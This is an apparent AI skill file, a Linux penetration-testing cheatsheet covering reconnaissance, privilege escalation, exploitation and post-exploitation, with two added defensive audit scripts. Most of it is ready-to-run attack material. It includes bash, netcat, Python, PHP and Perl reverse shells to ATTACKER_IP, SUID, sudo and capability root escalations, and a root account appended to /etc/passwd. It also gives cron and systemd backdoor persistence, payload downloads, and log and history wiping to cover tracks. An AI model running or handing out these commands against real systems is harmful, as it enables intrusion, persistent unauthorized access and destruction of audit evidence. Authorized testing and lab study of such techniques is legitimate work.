Practical Linux command reference for penetration testing including reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation techniques
---
name: linux-pentester-commands
description: Practical Linux command reference and techniques for penetration testing and security assessments
triggers:
- "help me with linux pentesting commands"
- "how do I enumerate services on linux"
- "show me privilege escalation techniques"
- "what are common recon commands for pentesting"
- "help with linux post exploitation"
- "how to find SUID binaries"
- "show pentesting cheatsheet for linux"
- "linux enumeration during a pentest"
---
# Linux Pentester Commands Skill
> Skill by [ara.so](https://ara.so) — Security Skills collection.
This skill provides practical Linux command knowledge for penetration testing, based on the HIMANSHUSHARMA20/Linux-for-a-Pentester repository. It covers reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation techniques with real-world commands used in CTFs and security assessments.
## What This Project Provides
A curated collection of Linux commands organized by penetration testing phases:
- **00-General-Commands**: Essential Linux survival commands
- **01-Recon**: Local and network reconnaissance
- **02-Enumeration**: Service and user enumeration
- **03-Exploitation**: Initial access techniques
- **04-Privilege-Escalation**: Methods to escalate to root
- **05-Post-Exploitation**: Persistence and lateral movement
- **Cheatsheets**: Quick reference one-liners
## Installation
Clone the repository for offline reference:
```bash
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
```
For quick access during engagements:
```bash
# Bookmark or alias the repo location
echo "alias pentester-notes='cd ~/Linux-for-a-Pentester'" >> ~/.bashrc
source ~/.bashrc
```
## General Commands (Survival Kit)
### File System Navigation
```bash
# Find writable directories
find / -writable -type d 2>/dev/null
# Find files by name
find / -name "*.conf" 2>/dev/null
# Search for SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Search for SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Find files modified in the last 10 minutes (-mmin -N, N in minutes)
find /var/log -mmin -10 2>/dev/null
```
### Text Processing
```bash
# Search recursively for strings
grep -r "password" /home 2>/dev/null
# Extract specific columns
cat users.txt | cut -d: -f1,3
# Sort and count unique occurrences
cat access.log | sort | uniq -c | sort -rn
# Decode base64
echo "dXNlcjpwYXNzd29yZA==" | base64 -d
```
## Reconnaissance Phase
### System Information
```bash
# OS and kernel version
uname -a
cat /etc/os-release
cat /proc/version
# CPU architecture
lscpu
# Disk information
df -h
lsblk
# Memory info
free -h
cat /proc/meminfo
```
### Network Reconnaissance
```bash
# List network interfaces
ip a
ifconfig
# Show routing table
ip route
route -n
# Active network connections
ss -tulpn
netstat -tulpn
# ARP cache
ip neigh
arp -a
# Check for network services
ps aux | grep -E 'apache|nginx|mysql|ssh'
```
### User and Group Enumeration
```bash
# Current user context
id
whoami
# List all users
cat /etc/passwd
# Users with login shells
cat /etc/passwd | grep -v nologin
# Group memberships
cat /etc/group
# Recently logged in users
last -a
who
w
# Command history
history
cat ~/.bash_history
```
## Service Enumeration
### Port Scanning (when tools unavailable)
```bash
# Bash TCP port scanner (uses the /dev/tcp pseudo-device, no nmap needed)
for port in {1..1000}; do
    timeout 1 bash -c "echo >/dev/tcp/127.0.0.1/$port" 2>/dev/null && echo "Port $port is open"
done
# Check specific port
(echo >/dev/tcp/10.10.10.1/80) &>/dev/null && echo "Port 80 open" || echo "Port 80 closed"
```
### Service Version Detection
```bash
# Apache/Nginx version
apache2 -v
nginx -v
curl -I http://localhost
# MySQL version
mysql --version
mysql -V
# SSH version (ssh -V prints to stderr); sshd_config holds no version string,
# so read the banner the server sends on connect instead
ssh -V
nc -w 2 127.0.0.1 22 </dev/null | head -n1
# PHP version
php -v
```
### Database Enumeration
```bash
# MySQL enumeration (log in, then run the SQL at the mysql> prompt)
mysql -u root -p
#   SHOW DATABASES;
#   USE database_name;
#   SHOW TABLES;
#   SELECT * FROM users;
# PostgreSQL (meta-commands at the psql prompt)
psql -U postgres
#   \l                 list databases
#   \c database_name   connect to database
#   \dt                list tables
```
## Privilege Escalation Techniques
### SUID/SGID Exploitation
```bash
# Find SUID binaries
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
# Common exploitable SUID binaries (the -perm test is required, otherwise
# every copy of these names is listed whether SUID or not)
find / -perm -4000 -type f \( -name nmap -o -name vim -o -name find -o -name "python*" \) 2>/dev/null
# Exploit find SUID
find . -exec /bin/bash -p \; -quit
# Exploit vim SUID
vim -c ':!/bin/bash' -c ':q'
# GTFOBins reference for SUID exploitation
# https://gtfobins.github.io/
```
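A defender's counterpart to the SUID search above, added here and not part of the Linux-for-a-Pentester repository: it records a baseline of SUID/SGID binaries on a known-good host and later reports anything that appeared, disappeared or changed mode/owner, which is how a newly planted setuid shell shows up. It assumes GNU find (for -printf) and GNU grep; the script name suidcheck.sh and the baseline path are hypothetical.

```shell
#!/bin/bash
# Baseline-and-diff check for SUID/SGID binaries. Added example, not from the
# Linux-for-a-Pentester repo. Record a baseline on a known-good host, then run
# "check" from cron to flag binaries that gained or lost setuid/setgid bits.
# Assumes GNU find (-printf) and GNU grep (-x -F -f).

# Print "mode owner path" for every SUID/SGID regular file under $1
# (default /), skipping /proc, sorted so snapshots are comparable.
suid_snapshot() {
    find "${1:-/}" -path /proc -prune -o -type f \
        \( -perm -4000 -o -perm -2000 \) -printf '%m %u %p\n' 2>/dev/null | sort
}

# Lines in the current snapshot ($2) that are absent from the baseline ($1):
# a new SUID/SGID binary, or an existing one whose mode or owner changed.
suid_new() {
    grep -vxFf "$1" "$2" || true
}

# Baseline lines that no longer appear in the current snapshot ($2).
suid_removed() {
    grep -vxFf "$2" "$1" || true
}

# Usage (hypothetical script name):
#   ./suidcheck.sh baseline /var/lib/suid.base [root]
#   ./suidcheck.sh check    /var/lib/suid.base [root]
case "${1:-}" in
    baseline)
        suid_snapshot "${3:-/}" > "$2" ;;
    check)
        now=$(mktemp)
        suid_snapshot "${3:-/}" > "$now"
        suid_new "$2" "$now"     | sed 's/^/NEW:  /'
        suid_removed "$2" "$now" | sed 's/^/GONE: /'
        rm -f "$now" ;;
    *)
        echo "usage: $0 baseline|check <baseline-file> [root]" >&2 ;;
esac
```

Run "check" from a root cron entry and alert on any NEW: line; an attacker's `chmod u+s` on a copied shell appears as a NEW: entry on the next run.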
### Sudo Exploitation
```bash
# Check sudo privileges
sudo -l
# Common sudo misconfigurations
# If (ALL:ALL) ALL or NOPASSWD:
sudo su
sudo bash
sudo /bin/sh
# Sudo vim exploit
sudo vim -c ':!/bin/bash'
# Sudo find exploit
sudo find . -exec /bin/bash \; -quit
# Sudo less/more exploit: at the less prompt, type !/bin/bash
sudo less /etc/profile
```
### Cron Job Exploitation
```bash
# List cron jobs
crontab -l
ls -la /etc/cron*
cat /etc/crontab
# Check for writable cron scripts
find /etc/cron* -type f -writable 2>/dev/null
# Monitor cron execution
watch -n 1 'ps aux | grep cron'
# Exploit writable cron script
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /path/to/script.sh
```
### Kernel Exploits
```bash
# Check kernel version
uname -a
cat /proc/version
# Common kernel exploits to research
# - DirtyCOW (CVE-2016-5195): Linux Kernel 2.6.22 < 3.9
# - Overlayfs (CVE-2021-3493): Ubuntu kernels
# - PwnKit (CVE-2021-4034): pkexec
# Search for kernel exploits
searchsploit kernel $(uname -r | cut -d'-' -f1)
```
### Writable /etc/passwd
```bash
# Check if writable
ls -la /etc/passwd
# Generate password hash
openssl passwd -1 -salt salt password123
# Add root user
echo 'newroot:$1$salt$qJH7.N4xYta3aEG/dfqo/0:0:0:root:/root:/bin/bash' >> /etc/passwd
# Switch to new user
su newroot
```
### Capabilities Exploitation
```bash
# List file capabilities
getcap -r / 2>/dev/null
# Python cap_setuid exploitation
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl cap_setuid
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
```
## Exploitation Techniques
### Reverse Shells
```bash
# Bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
# Netcat reverse shell
nc -e /bin/bash ATTACKER_IP 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f
# Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP reverse shell
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Perl reverse shell
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
### Shell Stabilization
```bash
# Python PTY upgrade
python -c 'import pty;pty.spawn("/bin/bash")'
# Then: Ctrl+Z
stty raw -echo; fg
export TERM=xterm
# Script command
script /dev/null -c bash
# Socat (if available)
# On attacker: socat file:`tty`,raw,echo=0 tcp-listen:4444
# On victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444
```
## Post-Exploitation
### Persistence Mechanisms
```bash
# Add SSH key
mkdir -p ~/.ssh
echo "ssh-rsa YOUR_PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# Create backdoor user
useradd -m -s /bin/bash backdoor
echo "backdoor:password123" | chpasswd
usermod -aG sudo backdoor
# Cron job persistence
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" | crontab -
# Service persistence
cat > /etc/systemd/system/backdoor.service <<EOF
[Unit]
Description=Backdoor Service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service
```
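The Writable /etc/passwd, Cron Job Exploitation and Persistence sections above all leave host-side artifacts; the audit below, added here and not part of the Linux-for-a-Pentester repository, flags a second UID-0 account or a hash stored in /etc/passwd, cron and systemd entries containing the reverse-shell fragments used on this page, world-writable cron scripts, and every key in an authorized_keys file. The crontab paths cover both Debian (/var/spool/cron/crontabs) and RHEL (/var/spool/cron) layouts; the script name audit.sh is hypothetical.

```shell
#!/bin/bash
# Host audit for the writable-/etc/passwd, cron and persistence techniques on
# this page. Added example, not from the Linux-for-a-Pentester repo. Findings
# are printed as "TAG: detail" so they can be diffed or forwarded to a SIEM.

# /etc/passwd checks on the passwd-format file in $1:
#   UID0_ACCOUNT   a second UID-0 account (the "add root user" trick above)
#   HASH_IN_PASSWD a hash placed in /etc/passwd instead of /etc/shadow
#   EMPTY_PASSWORD an empty password field (login without a password)
audit_passwd() {
    awk -F: '
        $3 == 0 && $1 != "root"            { print "UID0_ACCOUNT: " $1 }
        $2 == ""                           { print "EMPTY_PASSWORD: " $1 }
        $2 != "" && $2 != "x" && $2 != "*" { print "HASH_IN_PASSWD: " $1 }
    ' "$1"
}

# Fragments shared by the reverse-shell one-liners on this page; extend to
# taste. Scanned with grep -E across the cron/systemd files given as args.
REVSHELL_RE='/dev/tcp/|nc +-e|mkfifo|socket\.socket|fsockopen|SOCK_STREAM'
audit_persistence() {
    grep -HnE "$REVSHELL_RE" "$@" 2>/dev/null | sed 's/^/REVSHELL_CMD: /'
}

# Key type and comment of each key in an authorized_keys file ($1), options
# prefix tolerated, so an unexpected key stands out against a known list.
audit_authorized_keys() {
    awk '!/^[[:space:]]*(#|$)/ {
        for (i = 1; i <= NF; i++)
            if ($i ~ /^(ssh-|ecdsa-)/) { print "SSH_KEY: " $i " " $(i+2); break }
    }' "$1"
}

# Whole-host scan (run as root): ./audit.sh --scan
if [ "${1:-}" = "--scan" ]; then
    audit_passwd /etc/passwd
    audit_persistence /etc/crontab /etc/cron.*/* /var/spool/cron/crontabs/* \
        /var/spool/cron/* /etc/systemd/system/*.service
    find /etc/cron* -type f -perm -o=w -printf 'WRITABLE_CRON: %p\n' 2>/dev/null
    for k in /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys; do
        [ -r "$k" ] && audit_authorized_keys "$k"
    done
fi
```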
### Data Exfiltration
```bash
# Find sensitive files
find / -name "*.db" -o -name "*.sql" -o -name "*.conf" 2>/dev/null
find /home -name "*.txt" -o -name "*.pdf" 2>/dev/null
# Search for passwords
grep -ri "password" /var/www/html 2>/dev/null
grep -ri "passw" /home 2>/dev/null
# Database credentials
cat /var/www/html/config.php
cat /etc/mysql/my.cnf
# Archive and exfiltrate
tar czf /tmp/data.tar.gz /var/www/html
# Transfer via nc, scp, curl, etc.
```
### Covering Tracks
```bash
# Clear command history
history -c
echo "" > ~/.bash_history
# Clear logs
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
# Remove created files
find /tmp -user $(whoami) -delete
find /var/tmp -user $(whoami) -delete
```
## Common Patterns and Workflows
### Quick Enumeration Script
```bash
#!/bin/bash
echo "[*] System Information"
uname -a
echo "[*] User Information"
id
whoami
echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null | head -20
echo "[*] Sudo Privileges"
sudo -l 2>/dev/null
echo "[*] Cron Jobs"
cat /etc/crontab 2>/dev/null
echo "[*] Writable Directories in PATH"
# -maxdepth 0 tests each PATH entry itself rather than descending into it
echo "$PATH" | tr ':' '\n' | xargs -I {} find {} -maxdepth 0 -writable 2>/dev/null
```
### File Transfer Methods
```bash
# Using wget
wget http://ATTACKER_IP/file -O /tmp/file
# Using curl
curl http://ATTACKER_IP/file -o /tmp/file
# Using netcat
# Attacker: nc -lvnp 4444 < file
# Victim: nc ATTACKER_IP 4444 > file
# Using base64
# Attacker: cat file | base64
# Victim: echo "BASE64_STRING" | base64 -d > file
# Using Python HTTP server
# Attacker: python3 -m http.server 8000
# Victim: wget http://ATTACKER_IP:8000/file
```
## Troubleshooting
### Command Not Found
```bash
# Check if binary exists
which command_name
find / -name "command_name" 2>/dev/null
# Use absolute paths (e.g. /usr/bin/python3 instead of python3)
# Check PATH variable
echo $PATH
# Common binary locations
ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin
```
### Permission Denied Errors
```bash
# Check file permissions
ls -la file_name
# Check current user context
id
groups
# Use sudo if available
sudo command_name
# Check file capabilities
getcap file_name
```
### Network Connectivity Issues
```bash
# Check if target is reachable
ping -c 4 TARGET_IP
# Check firewall rules
iptables -L -n
cat /etc/iptables/rules.v4
# Test specific port
nc -zv TARGET_IP PORT
timeout 2 bash -c "echo >/dev/tcp/TARGET_IP/PORT" && echo "Open"
```
### Shell Instability
```bash
# Upgrade shell to fully interactive
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 38 columns 116 # Adjust to your terminal size
# If Python not available, try
script /dev/null -qc /bin/bash
```
## Security and Legal Considerations
**WARNING**: These commands and techniques should ONLY be used:
- On systems you own
- With explicit written permission
- In authorized penetration testing engagements
- In isolated lab environments (HTB, TryHackMe, etc.)
Unauthorized access to computer systems is illegal in most jurisdictions.
## Additional Resources
- GTFOBins: https://gtfobins.github.io/
- PEASS-ng (LinPEAS): Automated privilege escalation enumeration
- Linux Smart Enumeration (LSE): Quick enumeration script
- PayloadsAllTheThings: Comprehensive payload repository
Creator's repository · aradotso/security-skills